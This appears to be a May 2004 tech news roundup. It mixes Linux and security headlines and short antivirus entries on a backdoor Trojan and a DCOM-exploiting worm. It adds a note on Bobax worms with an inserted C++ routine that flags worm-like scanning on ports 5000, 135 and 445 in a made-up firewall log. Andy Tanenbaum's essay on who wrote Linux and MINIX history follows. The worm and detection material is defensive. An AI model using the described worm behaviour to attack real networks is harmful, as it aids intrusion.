While writing MINIX was fun, I don't really regard it as the most important thing I have ever done. It was more of a distraction than anything else. The most important thing I have done is produce a number of incredibly good students, especially Ph.D. students. See my home page for the list. They have done great things. I am as proud as a mother hen. To the extent that Linus can be counted as my student, I'm proud of him, too. Professors like it when their students go on to greater glory. I have also written over 100 published research papers and 14 books which have been translated into about 20 languages. As a result I have become a Fellow of the IEEE, a Fellow of the ACM, and won numerous other awards. For me, these are the things that really count. If MINIX had become a big 'commercial' success I wouldn't have had the time to do all this academic stuff that I am actually more interested in.
Microkernels Revisited

I can't resist saying a few words about microkernels. A microkernel is a very small kernel. If the file system runs inside the kernel, it is NOT a microkernel. The microkernel should handle low-level process management, scheduling, interprocess communication, interrupt handling, and the basics of memory management and little else. The core microkernel of MINIX 1.0 was under 1400 lines of C and assembler. To that you have to add the headers and device drivers, but the totality of everything that ran in kernel mode was under 5000 lines. Microsoft claimed that Windows NT 3.51 was a microkernel. It wasn't. It wasn't even close. Even they dropped the claim with NT 4.0. Some microkernels have been quite successful, such as QNX and L4. I can't for the life of me see why people object to the 20% performance hit a microkernel might give you when they program in languages like Java and Perl where you often get a factor 20x performance hit. What's the big deal about turning a 3.0 GHz PC into a 2.4 GHz PC due to a microkernel? Surely you once bought a machine appreciably slower than 2.4 GHz and were very happy with it. I would easily give up 20% in performance for a system that was robust, reliable, and wasn't susceptible to many of the ills we see in today's massive operating systems.

I would now like to correct an error in my original statement. One of the emails I got yesterday clarified the origins of Coherent. It was not written by Bob Swartz. He was CEO of the Mark Williams Company. Three ex-students from the University of Waterloo, Dave Conroy, Randell Howard, and Johann George, did most of the work. Waterloo is in Canada, where they also play baseball I am told, but only after the ice melts and they can't play hockey. It took the Waterloo students something like 6 man-years to produce Coherent, but this included the kernel, the C compiler, the shell, and ALL the utilities. The kernel is only a tiny fraction of the total code, so it may well be that the kernel itself took a man year. It took me three years to write MINIX, but I was working at it only in the evenings, and I also wrote 400 pages of text describing the code in that time period (also in the evenings). I think a good programmer can write a 12,000 line kernel in a year.

If you have made it this far, thank you for your time. Permission is hereby granted to mirror this web page provided that the original, unmodified version is used.

Andy Tanenbaum, 21 May 2004


Well, I had an early start today, had to drop my little sister off at school. Anyway, there is not much news today except for the usual exploits and such ; ). Happy reading.



Open-source group says no to SCO
Mozilla 1.8 Alpha 1 released download.

Linux News:

AbiWord v2.0.7 Released

uwog writes "While our current development series is bound to be a great success, we have not forgotten our stable releases. Therefore, the AbiWord development team is proud to release AbiWord v2.0.7. This release benefits greatly from the feature freeze currently active on our development series, which means that all our efforts are focussed on fixing bugs; bugs that might be present in the stable versions as well.
This release is a bugfix release only, with the addition of a new officially supported build system: MS Visual C++. The changes from 2.0.6 to 2.0.7 include, amongst others:
* Added MSVC6 support
* Fix full-screen mode on Windows
* Fix the incorrect height of the line after an image
* Fix crashers when merging table cells
* ... and a LOT more
The full ChangeLog can be found here. We encourage all users to upgrade to this latest stable release.
If you happen to run into a bug in this release, we would very much appreciate it if you would take some time to file a report in our bug database.
Main site (EU): http://www.abisource.com/download/.
More information
Main site (EU): http://www.abisource.com/.

Fedora Core 2 Review
Interview with Everaldo and Jimmac
Sun Java Desktop System review
PearPC 0.1: Is It A Miracle?
[Mono-list] Is it Mono safe?
20 May 2004: More patents.
Helix Player and RealPlayer 10 for Linux Alpha available!
Is a Whole New Approach to Linux on the Way from MS?
AbiWord v2.0.7 Released
IBM Goes on the Offensive and Asks for Partial Summary Judgment Now
Certification: A First Look at SUSE Certification


Cyber Security News:

Bugtraq: Internet explorer .clsid vulnerability
Bugtraq: [slackware-security] cvs (SSA:2004-140-01)
Symantec Norton AntiVirus Email Header Case Scan Bypass
Honeynet Project's Bug tracking site
Site Redesign proposal for insecure.org
Buffer Overflow books???
Hacker group gets dose of own medicine
Linux Advisory Watch - May 21st 2004
New evidence points to Cisco network hack
Cisco Still Mum On Reported Code Theft


Viruses and Worms

Backdoor.Leniv is a Backdoor Trojan horse that allows unauthorized remote access to an infected computer.
Also Known As: BackDoor-BCZ [McAfee], Backdoor.Leniv [Kaspersky], Troj/Leniv-A [Sophos]
Type: Trojan Horse
Infection Length: 78,848 bytes
Systems Affected: Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
Systems Not Affected: DOS, Linux, Macintosh, Novell Netware, OS/2, UNIX, Windows 3.x

W32.Donk.Q is a worm that spreads through open network shares and attempts to exploit the Microsoft DCOM RPC vulnerability (as described in Microsoft Security Bulletin MS03-026).
The worm can also open a backdoor on an infected computer.
Symantec Security Response has developed a removal tool to clean the infections of W32.Donk.Q.
Also Known As: W32/Sdbot.worm.gen.b [McAfee]
Type: Worm
Infection Length: 68,099 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Systems Not Affected: DOS, Linux, Macintosh, OS/2, UNIX
CVE References: CAN-2003-0352

More on the Bobax worms
There are now four different versions of the Bobax worm. All of them are used by spammers and controlled through a handful of websites. Some of the variants now even do bandwidth testing to find the most useful machines for spammers to send their spam from.
Also, later variants in the family spread through the RPC DCOM hole (135/TCP) in addition to the LSASS hole (445/TCP), and they fingerprint target systems through UPnP (5000/TCP).
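The three ports just named give a defender something concrete to look for: one source probing many hosts on 5000/TCP and then hitting the same hosts on 135/TCP or 445/TCP. The C++ below is an added example, not from the news item or any vendor, that scores a constructed firewall log for that pattern; the log format and addresses are made up for the example.

```cpp
#include <map>
#include <set>
#include <sstream>
#include <string>
#include <vector>

// One inbound connection attempt. The log format is constructed for this
// example, not taken from any particular firewall:
//   "<timestamp> <action> <proto> <src_ip> <dst_ip> <dst_port>"
struct Conn {
    std::string src, dst;
    int port;
};

// Parse one line; only TCP records are of interest here.
bool parseLine(const std::string &line, Conn &c) {
    std::istringstream is(line);
    std::string time, action, proto;
    if (!(is >> time >> action >> proto >> c.src >> c.dst >> c.port)) return false;
    return proto == "TCP";
}

// Which targets a source touched on each of the three ports named above.
struct SourceProfile {
    std::set<std::string> upnp, rpc, lsass;   // 5000, 135, 445
};

// Flag sources that fingerprinted hosts on 5000/TCP and also hit the same
// hosts on 135/TCP or 445/TCP, for at least minTargets distinct hosts.
// Ordering in time is not checked; a single share access or one UPnP probe
// on its own never reaches the threshold.
std::vector<std::string> findBobaxScanners(const std::vector<std::string> &lines, size_t minTargets) {
    std::map<std::string, SourceProfile> bySrc;
    for (const std::string &l : lines) {
        Conn c;
        if (!parseLine(l, c)) continue;
        SourceProfile &p = bySrc[c.src];
        if (c.port == 5000) p.upnp.insert(c.dst);
        else if (c.port == 135) p.rpc.insert(c.dst);
        else if (c.port == 445) p.lsass.insert(c.dst);
    }
    std::vector<std::string> flagged;
    for (const auto &kv : bySrc) {
        const SourceProfile &p = kv.second;
        size_t overlap = 0;
        for (const std::string &t : p.upnp)
            if (p.rpc.count(t) || p.lsass.count(t)) ++overlap;
        if (overlap >= minTargets) flagged.push_back(kv.first);
    }
    return flagged;
}

// Constructed sample: 10.0.0.66 behaves like the worm, 10.0.0.9 is an
// admin reaching one file share, 10.0.0.7 talks to one UPnP device.
const std::vector<std::string> sampleLog = {
    "2004-05-21T10:00:01 DROP TCP 10.0.0.66 10.0.0.1 5000",
    "2004-05-21T10:00:01 DROP TCP 10.0.0.66 10.0.0.2 5000",
    "2004-05-21T10:00:01 DROP TCP 10.0.0.66 10.0.0.3 5000",
    "2004-05-21T10:00:01 DROP TCP 10.0.0.66 10.0.0.4 5000",
    "2004-05-21T10:00:02 DROP TCP 10.0.0.66 10.0.0.1 135",
    "2004-05-21T10:00:02 DROP TCP 10.0.0.66 10.0.0.2 135",
    "2004-05-21T10:00:02 DROP TCP 10.0.0.66 10.0.0.3 445",
    "2004-05-21T10:00:02 DROP TCP 10.0.0.66 10.0.0.4 445",
    "2004-05-21T10:00:03 ALLOW TCP 10.0.0.9 10.0.0.1 445",
    "2004-05-21T10:00:04 ALLOW TCP 10.0.0.7 10.0.0.2 5000",
    "2004-05-21T10:00:05 ALLOW UDP 10.0.0.7 10.0.0.2 1900",
};
```

Running findBobaxScanners(sampleLog, 3) flags only 10.0.0.66; raising the threshold to 5 flags nothing.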

Person who tipped off Microsoft about Sasser author also under suspicion? Sophos comments
17 May 2004
According to reports in the German media, the person who gave Microsoft valuable information which led to the arrest of Sven Jaschan, the suspected author of the Sasser worm, may themselves be under suspicion.
It has been widely reported that the German office of Microsoft was approached on Wednesday 5 May by someone inquiring about whether a cash award was available for information leading to the capture of Sasser's author. According to Microsoft $250,000 was duly offered.
As well as Sven Jaschan, five other students at Jaschan's college are also being investigated. According to the German-language Focus news magazine, one of these five students was involved in passing information to Microsoft about Jaschan, and is now being investigated concerning computer sabotage.
Speaking of the five students who have been questioned and had their houses raided and computer systems examined, the public prosecutor's spokesman Detlev Dyballa was reported as saying: "I cannot rule out that these include the person who has tipped off Microsoft about the author of Sasser."
The person suspected of informing Microsoft has been reportedly named only as "Marle B". Dyballa refused to give more detailed information as the investigation continues.
Microsoft spokesman Thomas Baumgärtner has said that the software giant will not hand out a reward to those involved in the crime: "If they were involved in the Sasser case, they won't get anything".
"Mystery continues to surround the identity of the Sasser informants, and security experts have publicly speculated that maybe they are involved in the computer underground," said Graham Cluley, senior technology consultant for Sophos. "If Sven Jaschan's identity as the author of Sasser was revealed by one of his fellow students then it's possible there was a violent disagreement between those engaged in spreading the viruses."

Hackers spread virus, force shutdown of Gaston County e-mails
Sasser fan club stops rattling tin
Person who tipped off Microsoft about Sasser author also under suspicion? Sophos comments


Google News:

Google Image Ads…
Google Gmail Beta



Worst Explanation From Tech Support?
Examining the Blackout
Blackout Bug Proves Limits of Software Testing
California town for sale on eBay finally sold
Italy approves 'jail for P2P users' law
Blogging at Microsoft Backgrounder
C Programming



Linux News:

Some Notes on the "Who wrote Linux" Kerfuffle, Release 1.4

by Andy Tanenbaum, 20 May 2004

The history of UNIX and its various children and grandchildren has been in the news recently as a result of a book from the Alexis de Tocqueville Institution. Since I was involved in part of this history, I feel I have an obligation to set the record straight and correct some extremely serious errors. But first some background information.

Ken Brown, President of the Alexis de Tocqueville Institution, contacted me in early March. He said he was writing a book on the history of UNIX and would like to interview me. Since I have written 15 books and have been involved in the history of UNIX in several ways, I said I was willing to help out. I have been interviewed by many people for many reasons over the years, and have been on Dutch and US TV and radio and in various newspapers and magazines, so I didn't think too much about it.

Brown flew over to Amsterdam to interview me on 23 March 2004. Apparently I was the only reason for his coming to Europe. The interview got off to a shaky start, roughly paraphrased as follows:
AST: "What's the Alexis de Tocqueville Institution?"
KB: We do public policy work
AST: A think tank, like the Rand Corporation?
KB: Sort of
AST: What does it do?
KB: Issue reports and books
AST: Who funds it?
KB: We have multiple funding sources
AST: Is SCO one of them? Is this about the SCO lawsuit?
KB: We have multiple funding sources
AST: Is Microsoft one of them?
KB: We have multiple funding sources

He was extremely evasive about why he was there and who was funding him. He just kept saying he was just writing a book about the history of UNIX. I asked him what he thought of Peter Salus' book, A Quarter Century of UNIX. He'd never heard of it! I mean, if you are writing a book on the history of UNIX and flying 3000 miles to interview some guy about the subject, wouldn't it make sense to at least go to amazon.com and type "history unix" in the search box, in which case Salus' book is the first hit? For $28 (and free shipping if you play your cards right) you could learn an awful lot about the material and not get any jet lag. As I soon learned, Brown is not the sharpest knife in the drawer, but I was already suspicious. As a long-time author, I know it makes sense to at least be aware of what the competition is. He didn't bother.
UNIX and Me

I didn't think it odd that Brown would want to interview me about the history of UNIX. There are worse people to ask. In the late 1970s and early 1980s, I spent several summers in the UNIX group (Dept. 1127) at Bell Labs. I knew Ken Thompson, Dennis Ritchie, and the rest of the people involved in the development of UNIX. I have stayed at Rob Pike's house and Al Aho's house for extended periods of time. Dennis Ritchie, Steve Johnson, and Peter Weinberger, among others have stayed at my house in Amsterdam. Three of my Ph.D. students have worked in the UNIX group at Bell Labs and one of them is a permanent staff member now.

Oddly enough, when I was at Bell Labs, my interest was not operating systems, although I had written one and published a paper about it (see "Software - Practice & Experience," vol. 2, pp. 109-119, 1973). My interest then was compilers, since I was the chief designer of the Amsterdam Compiler Kit (see Commun. of the ACM, vol. 26, pp. 654-660, Sept. 1983). I spent some time there discussing compilers with Steve Johnson, networking with Greg Chesson, writing tools with Lorinda Cherry, and book authoring with Brian Kernighan, among many others. I also became friends with the other "foreigner" there, Bjarne Stroustrup, who would later go on to design and implement C++.

In short, although I had nothing to do with the development of the original UNIX, I knew all the people involved and much of the history quite well. Furthermore, my contact with the UNIX group at Bell Labs was not a secret; I even thanked them all for having me as a summer visitor in the preface to the first edition of my book Computer Networks. Amazingly, Brown knew nothing about any of this. He didn't do his homework before embarking on his little project.
MINIX and Me

Years later, I was teaching a course on operating systems and using John Lions' book on UNIX Version 6. When AT&T decided to forbid the teaching of the UNIX internals, I decided to write my own version of UNIX, free of all AT&T code and restrictions, so I could teach from it. My inspiration was not my time at Bell Labs, although the knowledge that one person could write a UNIX-like operating system (Ken Thompson wrote UNICS on a PDP-7) told me it could be done. My real inspiration was an off-hand remark by Butler Lampson in an operating systems course I took from him when I was a Ph.D. student at Berkeley. Lampson had just finished describing the pioneering CTSS operating system and said, in his inimitable way: "Is there anybody here who couldn't write CTSS in a month?" Nobody raised his hand. I concluded that you'd have to be real dumb not to be able to write an operating system in a month. The paper cited above is an operating system I wrote at Berkeley with the help of Bill Benson. It took a lot more than a month, but I am not as smart as Butler. Nobody is.

I set out to write a minimal UNIX clone, MINIX, and did it alone. The code was 100% free of AT&T's intellectual property. The full source code was published in 1987 as the appendix to a book, Operating Systems: Design and Implementation, which later went into a second edition co-authored with Al Woodhull. MINIX 2.0 was even POSIX-conformant. Both editions contained hundreds of pages of text describing the code in great detail. A box of 10 floppy disks containing all the binaries and source code was available separately from Prentice Hall for $69.

While this was not free software in the sense of "free beer" it was free software in the sense of "free speech" since all the source code was available for only slightly more than the manufacturing cost. But even "free speech" is not completely "free"--think about slander, yelling "fire" in a crowded theater, etc. And this was before the Patriot Act, which requires John Ashcroft's written permission before you can open your mouth. Also remember (if you are old enough) that by 1987, a university educational license for UNIX cost $300, a commercial license for a university cost $28,000, and a commercial license for a company cost a lot more. For the first time, MINIX brought the cost of "UNIX-like" source code down to something a student could afford. Prentice Hall wasn't really interested in selling software. They were interested in selling books, so there was a fairly liberal policy on copying MINIX, but if a company wanted to sell it to make big bucks, PH wanted a royalty. Hence the PH lawyers equipped MINIX with a lot of boilerplate, but there was never any intention of really enforcing this against universities or students. Using the Internet for distributing that much code was not feasible in 1987, even for people with a high-speed (i.e., 1200 bps) modem. When distribution via the Internet became feasible, I convinced Prentice Hall to drop its (extremely modest) commercial ambitions and they gave me permission to put the source on my website for free downloading, where it still is.

Within a couple of months of its release, MINIX became something of a cult item, with its own USENET newsgroup, comp.os.minix, with 40,000 subscribers. Many people added new utility programs and improved the kernel in numerous ways, but the original kernel was just the work of one person--me. Many people started pestering me about improving it. In addition to the many messages in the USENET newsgroup, I was getting 200 e-mails a day (at a time when only the chosen few had e-mail at all) saying things like: "I need pseudoterminals and I need them by Friday." My answer was generally quick and to the point: "No."

The reason for my frequent "no" was that everyone was trying to turn MINIX into a production-quality UNIX system and I didn't want it to get so complicated that it would become useless for my purpose, namely, teaching it to students. I also expected that the niche for a free production-quality UNIX system would be filled by either GNU or Berkeley UNIX shortly, so I wasn't really aiming at that. As it turned out, the GNU OS sort of went nowhere (although many UNIX utilities were written) and Berkeley UNIX got tied up in a lawsuit when its designers formed a company, BSDI, to sell it and they chose 1-800-ITS UNIX as their phone number. AT&T felt this constituted copyright infringement and sued them. It took a couple of years for this to get resolved. This delay in getting free BSD out there gave Linux the breathing space it needed to catch on. If it hadn't been for the lawsuit, undoubtedly BSD would have filled the niche for a powerful, free UNIX clone as it was already a stable, mature system with a large following.
Ken Brown and Me
Now Ken Brown shows up and begins asking questions. I quickly determined that he didn't know a thing about the history of UNIX, had never heard of the Salus book, and knew nothing about BSD and the AT&T lawsuit. I started to tell him the history, but he stopped me and said he was more interested in the legal aspects. I said: "Oh you mean about Dennis Ritchie's patent number 4135240 on the setuid bit?" Then I added: "That's not a problem. Bell Labs dedicated the patent." That's when I discovered that (1) he had never heard of the patent, (2) did not know what it meant to dedicate a patent (i.e., put it in the public domain), and (3) really did not know a thing about intellectual property law. He was confused about patents, copyrights, and trademarks. Gratuitously, I asked if he was a lawyer, but it was obvious he was not and he admitted it. At this point I was still thinking he might be a spy from SCO, but if he was, SCO was not getting its money's worth.

He wanted to go on about the ownership issue, but he was also trying to avoid telling me what his real purpose was, so he didn't phrase his questions very well. Finally he asked me if I thought Linus wrote Linux. I said that to the best of my knowledge, Linus wrote the whole kernel himself, but after it was released, other people began improving the kernel, which was very primitive initially, and adding new software to the system--essentially the same development model as MINIX. Then he began to focus on this, with questions like: "Didn't he steal pieces of MINIX without permission?" I told him that MINIX clearly had a huge influence on Linux in many ways, from the layout of the file system to the names in the source tree, but I didn't think Linus had used any of my code. Linus also used MINIX as his development platform initially, but there was nothing wrong with that. He asked if I objected to that and I said no, I didn't, people were free to use it as they wished for noncommercial purposes. Later MINIX was released under the Berkeley license, which freed it up for all purposes. It is still in surprisingly wide use, both for education and in the Third World, where millions of people are happy as a clam to have an old castoff 1-MB 386, on which MINIX runs just fine. The MINIX home page cited above still gets more than 1000 hits a week.

Finally, Brown began to focus sharply. He kept asking, in different forms, how one person could write an operating system all by himself. He simply didn't believe that was possible. So I had to give him more history, sigh. To start with, Ken Thompson wrote UNICS for the PDP-7 all by himself. When it was later moved to the PDP-11 and rewritten in C, Dennis Ritchie joined the team, but primarily focused on designing the C language, writing the C compiler, and writing the I/O system and device drivers. Ken wrote nearly all of the kernel himself.

In 1983, a now-defunct company named the Mark Williams company produced and sold a very good UNIX clone called Coherent. Most of the work was done by Bob Swartz. I used this system for a while and it was very solid.

In 1983, Rick Holt published a book, now out of print, on the TUNIS system, a UNIX-like system. This was certainly a rewrite since TUNIS was written in a completely new language, concurrent Euclid.

Then Doug Comer wrote XINU. While also not a UNIX clone, it was a comparable system.

By the time Linus started, five people had independently implemented the UNIX kernel or something approximating it, namely, Thompson, Swartz, Holt, Comer, and me. All of this was perfectly legal and nobody stole anything. Given this history, it is pretty hard to make a case that one person can't implement a system of the complexity of Linux, whose original size was about the same as V1.0 of MINIX.

Of course it is always true in science that people build upon the work of their predecessors. Even Ken Thompson wasn't the first. Before writing UNIX, Ken had worked on the MIT MULTICS (MULTiplexed Information and Computing Service) system. In fact, the original name of UNIX was UNICS, a joke made by Brian Kernighan standing for the UNIplexed Information and Computing Service, since the PDP-7 version could support only one user--Ken. After too many bad puns about EUNUCHS being a castrated MULTICS, the name was changed to UNIX. But even MULTICS wasn't first. Before it was the above-mentioned CTSS, designed by the same team at MIT.

Thus, of course, Linus didn't sit down in a vacuum and suddenly type in the Linux source code. He had my book, was running MINIX, and undoubtedly knew the history (since it is in my book). But the code was his. The proof of this is that he messed the design up. MINIX is a nice, modular microkernel system, with the memory manager and file system running as user-space processes. This makes the system cleaner and more reliable than a big monolithic kernel and easier to debug and maintain, at a small price in performance, although even on a 4.77 MHz 8088 it booted in maybe 5 seconds (vs. a minute for Windows on hardware 500 times faster). An example of a commercially successful microkernel is QNX. Instead of writing a new file system and a new memory manager, which would have been easy, Linus rewrote the whole thing as a big monolithic kernel, complete with inline assembly code :-( . The first version of Linux was like a time machine. It went back to a system worse than what he already had on his desk. Of course, he was just a kid and didn't know better (although if he had paid better attention in class he should have), but producing a system that was fundamentally different from the base he started with seems pretty good proof that it was a redesign. I don't think he could have copied UNIX because he didn't have access to the UNIX source code, except maybe John Lions' book, which is about an earlier version of UNIX that does not resemble Linux so much.

My conclusion is that Ken Brown doesn't have a clue what he is talking about. I also have grave questions about his methodology. After he talked to me, he prowled the university halls buttonholing random students and asking them questions. Not exactly primary sources.

The six people I know of who (re)wrote UNIX all did it independently and nobody stole anything from anyone. Brown's remark that people have tried and failed for 30 years to build UNIX-like systems is patent nonsense. Six different people did it independently of one another. In science it is considered important to credit people for their ideas, and I think Linus has done this far less than he should have. Ken and Dennis are the real heroes here. But Linus' sloppiness about attribution is no reason to assert that Linus didn't write Linux. He didn't write CTSS and he didn't write MULTICS and didn't write UNIX and he didn't write MINIX, but he did write Linux. I think Brown owes a number of us an apology.

Linus and Me

Some of you may find it odd that I am defending Linus here. After all, he and I had a fairly public "debate" some years back. My primary concern here is trying to get the truth out and not blame everything on some teenage girl from the back hills of West Virginia. Also, Linus and I are not "enemies" or anything like that. I met him once and he seemed like a nice, friendly, smart guy. My only regret is that he didn't develop Linux based on the microkernel technology of MINIX. With all the security problems Windows has now, it is increasingly obvious to everyone that tiny microkernels, like that of MINIX, are a better base for operating systems than huge monolithic systems. Linux has been the victim of fewer attacks than Windows because (1) it actually is more secure, but also (2) most attackers think hitting Windows offers a bigger bang for the buck so Windows simply gets attacked more. As I did 20 years ago, I still fervently believe that the only way to make software secure, reliable, and fast is to make it small. Fight Features.

If you have made it this far, thank you for your time. Permission is hereby granted to mirror this web page provided that the original, unmodified version is used.

Andy Tanenbaum, 20 May 2004